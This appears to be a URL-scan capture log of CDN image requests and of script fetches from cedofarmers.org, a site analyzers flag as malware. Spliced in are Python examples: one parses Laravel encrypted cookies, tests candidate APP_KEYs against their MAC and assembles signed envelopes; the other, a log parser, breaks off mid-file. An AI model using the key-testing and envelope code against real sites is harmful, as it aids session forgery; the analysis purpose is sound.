Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 9313
x-amzn-requestid: be3f6b0f-cf61-4bec-ad1a-87abdbc45d73
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: bTTTwF5AoAMFZAw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-636acc17-5ca45b5b1065a4ea492f2ac6;Sampled=0
x-amzn-remapped-date: Tue, 08 Nov 2022 21:37:27 GMT
x-amz-cf-pop: SEA19-C3, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: 9lVY7YgQQ0FAP3ItgCSWePY0Msd4RIyBz4eNPc-K51BtnWUjOObv6g==
via: 1.1 31dfa94142c6eaf975b0e5454c00340a.cloudfront.net (CloudFront), 1.1 707e733794d52100fde0ab21bf0b1462.cloudfront.net (CloudFront), 1.1 google
date: Tue, 08 Nov 2022 21:43:43 GMT
etag: "9265cae98aa663a5498925b70079abdd8e7031fd"
content-type: image/jpeg
age: 2214
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F8f9389c7-c025-4f6b-b922-12f7edbee6c5.png
34.120.237.76 200 OK 9.8 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F8f9389c7-c025-4f6b-b922-12f7edbee6c5.png
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3
Hash b2690c9cc30d7974ed39c4d680d9cb93
132e96b7579376ccf4c868f33c8229ab534b45ea
c17b9b14a7347b0d4cd6ea2b5a44e47abc6e6cdba5c3ed082342da752eb6f8f0
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F8f9389c7-c025-4f6b-b922-12f7edbee6c5.png HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 9792
x-amzn-requestid: 901422d7-08e6-46ac-a8a2-efd52057cde8
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: atDvMGq2oAMFq_g=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-635b7ffa-17055cbc5c8a0172775650a6;Sampled=0
x-amzn-remapped-date: Fri, 28 Oct 2022 07:08:42 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: gpFfSzKikjfuVfVxOVQDu8znJIQZPsokevZWivGPlsSKst68YF5tLQ==
via: 1.1 6ba2a21321beeef65404429d0a4b6380.cloudfront.net (CloudFront), 1.1 cd858042f70b416ca05e042acf3908a4.cloudfront.net (CloudFront), 1.1 google
date: Tue, 08 Nov 2022 21:43:57 GMT
age: 2200
etag: "132e96b7579376ccf4c868f33c8229ab534b45ea"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F6ec06e64-918f-480d-ac05-7fea783ee61f.jpeg
34.120.237.76 200 OK 12 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F6ec06e64-918f-480d-ac05-7fea783ee61f.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3
Hash 251feed4603d868ab84aa13c9b8edbdb
381a81a8dcff741612c76f5fdfb42bc13372a119
2dc3848fa2917b3b909e39104657601f41876935b217371a50ee15f778e5a9f5
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F6ec06e64-918f-480d-ac05-7fea783ee61f.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 11723
x-amzn-requestid: 955f8ec3-9815-48ff-aa6a-250956377cdf
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: bTTVLFo5oAMF2UA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-636acc20-70e216d808330566039aee89;Sampled=0
x-amzn-remapped-date: Tue, 08 Nov 2022 21:37:36 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: yq_iWDuX0BUgchE1acIl9ARNm1Zxd7bwoeTIEVoD9MYKGzwYmuM1aw==
via: 1.1 9c60d6224ac0b44e908b5c9dcf70e9a4.cloudfront.net (CloudFront), 1.1 b13f158bdf9805ca47e07c0c35870c12.cloudfront.net (CloudFront), 1.1 google
date: Tue, 08 Nov 2022 21:43:44 GMT
age: 2213
etag: "381a81a8dcff741612c76f5fdfb42bc13372a119"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F892db5b6-1bca-4d8f-b844-3201ef7b3ef0.jpeg
34.120.237.76 200 OK 12 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F892db5b6-1bca-4d8f-b844-3201ef7b3ef0.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3
Hash e3d20f900a883cec8e0cab687df8a251
1105130523fb346dbab9ad2bb8d71c3f505425ce
b5ade9b1302479c4589eb659125d0111c55bb4520d72501cc47b295fd65e8a6e
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F892db5b6-1bca-4d8f-b844-3201ef7b3ef0.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 12510
x-amzn-requestid: ad966326-25a8-44df-880a-608572bf2538
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: bTTTuExNIAMFilA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-636acc17-4eaa4fda178720702d9a9583;Sampled=0
x-amzn-remapped-date: Tue, 08 Nov 2022 21:37:27 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: ZlRHZYYt_p4bzFjTJAzXR08Oj0B_m9qLrpOAysjxJ2F9tzzF4G7U8g==
via: 1.1 6ba2a21321beeef65404429d0a4b6380.cloudfront.net (CloudFront), 1.1 e80693c02cfdfd081110512210d57840.cloudfront.net (CloudFront), 1.1 google
date: Tue, 08 Nov 2022 21:43:44 GMT
age: 2213
etag: "1105130523fb346dbab9ad2bb8d71c3f505425ce"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Faf9d55c4-e1e8-4687-8395-004d7c4a0225.jpeg
34.120.237.76 200 OK 6.6 kB URL HTTP/2 img-getpocket.cdn.mozilla.net/296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Faf9d55c4-e1e8-4687-8395-004d7c4a0225.jpeg
IP 34.120.237.76:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3
Hash b3cd10472aabf86c5ffdfd06057f87f6
82728de12017be85f27e65a7222573058aad37c3
1bbb913786c95b51639193739d2cf01de1cdd8afe8b68dfef378b989129f0ef4
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Faf9d55c4-e1e8-4687-8395-004d7c4a0225.jpeg HTTP/1.1
Host: img-getpocket.cdn.mozilla.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
content-length: 6635
x-amzn-requestid: 8348f858-989b-4643-b6f8-4f7254b154ee
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: bTTmaHunIAMFalA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-636acc8f-02cc736a29efbcb473e20402;Sampled=0
x-amzn-remapped-date: Tue, 08 Nov 2022 21:39:27 GMT
x-amz-cf-pop: SEA19-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: h1nLdkhJjsLSGP0pS3mmDwAcsKSLD-rYRaRt4X9_L2jWTNQaiVJbqw==
via: 1.1 34f8ef0e4c880df0650a814412a26ea6.cloudfront.net (CloudFront), 1.1 02d90bf99fd6253b329a53c82f19e224.cloudfront.net (CloudFront), 1.1 google
date: Tue, 08 Nov 2022 21:43:44 GMT
age: 2214
etag: "82728de12017be85f27e65a7222573058aad37c3"
content-type: image/jpeg
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2
cedofarmers.org/js/index.js
192.185.57.117 200 OK 467 B URL HTTP/2 cedofarmers.org/js/index.js
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Hash 73fd203856751378aeb85a6f208f323e
40050647cc618d020743a5b763a5daca3c5d10e1
dbbf9922f8df175089acdbeae683e19d990ac333922a37bea45332170571f960
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /js/index.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Wed, 05 Jun 2019 08:05:04 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 467
content-type: application/javascript
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
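Every cedofarmers.org request above carries two Laravel cookies, XSRF-TOKEN and laravel_session. Both are in the envelope written by Laravel's Encrypter: base64 of a JSON object with members iv, value and mac, where iv and value are base64 of the AES-CBC IV and ciphertext and mac is the hex HMAC-SHA256 over the two base64 strings, iv first, keyed with the application's APP_KEY (newer Laravel releases add a tag member for GCM ciphers; these cookies have none). Nothing in the session can be read without that key, but the structure itself tells an analyst what the cookies are, and a candidate key (a leaked .env, a value copied from a tutorial) can be confirmed or ruled out by recomputing the MAC, with no decryption attempt. The code below is an added example, not part of this report or of the Laravel project; it embeds the Cookie header exactly as sent above, and DEMO_APP_KEY is a made-up key used only to show what a positive match looks like.

```python
import base64
import hashlib
import hmac
import json
from dataclasses import dataclass
from typing import Dict, Iterable, Optional
from urllib.parse import unquote

# The Cookie header exactly as Firefox sent it on the cedofarmers.org script
# requests above (two cookies, both URL-encoded base64).
PAGE_COOKIE_HEADER = (
    "XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; "
    "laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D"
)

# Made-up APP_KEY, used only to show what a positive MAC match looks like. The
# real cedofarmers.org key is unknown, so the page's cookies cannot match it.
DEMO_APP_KEY = "base64:" + base64.b64encode(bytes(range(32))).decode()


@dataclass
class LaravelEnvelope:
    iv_b64: str     # base64 IV as stored in the JSON (16 bytes for AES-*-CBC)
    value_b64: str  # base64 ciphertext as stored in the JSON
    mac: str        # hex HMAC-SHA256 as stored in the JSON

    @property
    def iv(self) -> bytes:
        return base64.b64decode(self.iv_b64)

    @property
    def ciphertext(self) -> bytes:
        return base64.b64decode(self.value_b64)

    def mac_input(self) -> bytes:
        # Laravel: hash_hmac('sha256', $iv . $value, $key), over the base64 strings.
        return (self.iv_b64 + self.value_b64).encode()


def parse_cookie_header(header: str) -> Dict[str, str]:
    """Split a Cookie request header into {name: raw value}, no decoding."""
    jar: Dict[str, str] = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            jar[name] = value
    return jar


def parse_laravel_envelope(cookie_value: str) -> LaravelEnvelope:
    """Decode base64(JSON{iv,value,mac}) and sanity-check the field shapes."""
    obj = json.loads(base64.b64decode(unquote(cookie_value)))
    missing = [k for k in ("iv", "value", "mac") if k not in obj]
    if missing:
        raise ValueError(f"not a Laravel encrypted cookie, missing {missing}")
    env = LaravelEnvelope(obj["iv"], obj["value"], obj["mac"])
    if len(env.iv) != 16 or len(env.ciphertext) % 16 != 0:
        raise ValueError("iv/ciphertext lengths are not those of AES-CBC")
    if len(env.mac) != 64 or set(env.mac) - set("0123456789abcdef"):
        raise ValueError("mac is not a 32-byte hex HMAC")
    return env


def app_key_bytes(app_key: str) -> bytes:
    """APP_KEY is either a raw string or 'base64:<key>', which Laravel decodes."""
    if app_key.startswith("base64:"):
        return base64.b64decode(app_key[len("base64:"):])
    return app_key.encode()


def verify_mac(env: LaravelEnvelope, app_key: str) -> bool:
    expected = hmac.new(app_key_bytes(app_key), env.mac_input(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, env.mac)


def find_signing_key(env: LaravelEnvelope, candidates: Iterable[str]) -> Optional[str]:
    """First candidate APP_KEY whose HMAC matches the envelope, or None."""
    for key in candidates:
        if verify_mac(env, key):
            return key
    return None


def build_envelope(iv: bytes, ciphertext: bytes, app_key: str) -> str:
    """Assemble a cookie value the way Laravel does, given an already-encrypted
    payload (the AES step is left out; only the envelope and MAC are shown)."""
    iv_b64 = base64.b64encode(iv).decode()
    value_b64 = base64.b64encode(ciphertext).decode()
    mac = hmac.new(app_key_bytes(app_key), (iv_b64 + value_b64).encode(), hashlib.sha256).hexdigest()
    payload = json.dumps({"iv": iv_b64, "value": value_b64, "mac": mac}, separators=(",", ":"))
    return base64.b64encode(payload.encode()).decode()
```

On the page's cookies the parser reports a 16-byte IV and 96 bytes of ciphertext for both XSRF-TOKEN and laravel_session, six AES blocks, which is what a serialized 40-character Laravel token with the cookie-name prefix pads out to; verify_mac against any guessed key returns False, as expected without the site's APP_KEY. The MAC is checked with hmac.compare_digest so that a key-guessing loop does not itself become a timing oracle if it is ever pointed at a live server.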
cedofarmers.org/js/main.js
192.185.57.117 200 OK 2.3 kB URL HTTP/2 cedofarmers.org/js/main.js
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Hash b2f80211a529090e618b1f35f30f1d4d
0fb79a31eb9f7512452cfba90208632a5131c5e9
988394aa7d1206bc442db463165ef47cc253826aac2488861a8718b367cc2170
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /js/main.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Sat, 29 Jun 2019 03:45:10 GMT
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
content-length: 2305
content-type: application/javascript
date: Tue, 08 Nov 2022 22:20:36 GMT
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/main.js
192.185.57.117 404 Not Found 2.4 kB IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type HTML document text, exported SGML document, ASCII text, with very long lines (5395)
Hash 2cdccc9eccc72b2742298d87caffaad1
6edb66f8bee92447167a98055ae225ee85945647
a4033c6180cf444d30d417f543c3c7b28b291d28169557e02269168f4ce20678
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /main.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 404 Not Found
cache-control: no-cache, private
date: Tue, 08 Nov 2022 22:20:36 GMT
vary: Accept-Encoding
content-encoding: gzip
content-length: 2401
content-type: text/html; charset=UTF-8
server: Apache
X-Firefox-Spdy: h2
cedofarmers.org/js/google-map.js
192.185.57.117 404 Not Found 2.4 kB URL HTTP/2 cedofarmers.org/js/google-map.js
IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
File type HTML document text, exported SGML document, ASCII text, with very long lines (5395)
Hash 2cdccc9eccc72b2742298d87caffaad1
6edb66f8bee92447167a98055ae225ee85945647
a4033c6180cf444d30d417f543c3c7b28b291d28169557e02269168f4ce20678
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /js/google-map.js HTTP/1.1
Host: cedofarmers.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://cedofarmers.org/index.php
Cookie: XSRF-TOKEN=eyJpdiI6Ii9pTjBBWWQyNGtCZ0ptb1JIcjRDN2c9PSIsInZhbHVlIjoieGRCQlpDVlhmZVRqWDhLc2o2VVZsWFgxc2Zxdll5WTEvanBBNmxHVmJ1S1B3ZklXODlPdFAxbXA2L21OdWczVlZzQ056N0djVDQyaTE0bWRhc01veWJUSm9ybDFTeUpmSW1BdDRtWlhpL293d1kvK3grYmM2cVArUExEQnM0REYiLCJtYWMiOiJkOTZiOTY5MGRhYzYwZTdjNzY2MzRjOGRlNWY2YzdiZmE3ZDViNmMzMGJlNzM4Yjg5YTJlNzI3NjZiZWE0NjhiIn0%3D; laravel_session=eyJpdiI6Ii9qYXQvckZQNDNlQVcvalVtZ1dyT0E9PSIsInZhbHVlIjoieUVENXZwS3QycFlFYTk1Qkl2YjEyczVVcUpEUkZkT3pLZXVYeVBoM3N6UnZxM3UwbFhaQjhxaDNrSGZOSHJ5b2h6K0kveTA5d1lQZUhFV3FoWlF2cjBldzJOUVBScG13SytBMU1iREJaeGwwT3pOU3FpajBkZ3pZQ2Z4Rnp0blQiLCJtYWMiOiIxODFlYTk1MjY4MDRjYTc4MGNhNWE4ZDlkZTUwYjY1YWFhMjAxMTA3NmE1NzYyOTYzNWYzMzEwODI2OGNiMjJhIn0%3D
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 404 Not Found
cache-control: no-cache, private
date: Tue, 08 Nov 2022 22:20:36 GMT
vary: Accept-Encoding
content-encoding: gzip
content-length: 2401
content-type: text/html; charset=UTF-8
server: Apache
X-Firefox-Spdy: h2
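The records on this page follow one fixed layout: a URL line, then an IP/status/size line, optional ASN and file-type lines, MD5, SHA-1 and SHA-256 on their own lines, optional analyzer verdicts (the "Analyzer Verdict Alert" row and the rows beneath it), then the request line with its headers and the response status with its headers. The parser below is an added example, not part of this report or of any sandbox vendor's tooling. It runs over a condensed copy of the two cedofarmers.org 404 records above (headers trimmed, one record left with the IP and status columns fused as the extraction produced them) and then applies two triage checks an analyst would want from such a capture: which hosts any analyzer flagged, and which script fetches were answered with an HTML body.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Condensed from the two cedofarmers.org 404 records above (headers trimmed; the
# first record keeps the fused "IP+status" column exactly as the extraction left it).
SAMPLE = """\
cedofarmers.org/main.js
192.185.57.117404 Not Found 2.4 kB IP 192.185.57.117:0
ASN #46606 UNIFIEDLAYER-AS-1
Hash 2cdccc9eccc72b2742298d87caffaad1
6edb66f8bee92447167a98055ae225ee85945647
a4033c6180cf444d30d417f543c3c7b28b291d28169557e02269168f4ce20678
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /main.js HTTP/1.1
Host: cedofarmers.org
Sec-Fetch-Dest: script
HTTP/2 404 Not Found
cache-control: no-cache, private
content-type: text/html; charset=UTF-8
cedofarmers.org/js/google-map.js
192.185.57.117 404 Not Found 2.4 kB URL HTTP/2 cedofarmers.org/js/google-map.js
IP 192.185.57.117:0
Hash 2cdccc9eccc72b2742298d87caffaad1
6edb66f8bee92447167a98055ae225ee85945647
a4033c6180cf444d30d417f543c3c7b28b291d28169557e02269168f4ce20678
Analyzer Verdict Alert fortinet Malware
mnemonic_dns Sinkholed
quad9 Sinkholed
GET /js/google-map.js HTTP/1.1
Host: cedofarmers.org
Sec-Fetch-Dest: script
HTTP/2 404 Not Found
content-type: text/html; charset=UTF-8
"""

# "IP STATUS REASON SIZE ..."; the \s? tolerates the space the extraction dropped.
STATUS_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})\s?(\d{3}) ([A-Za-z][A-Za-z ]*?) (\d+(?:\.\d+)? ?k?B)\b")
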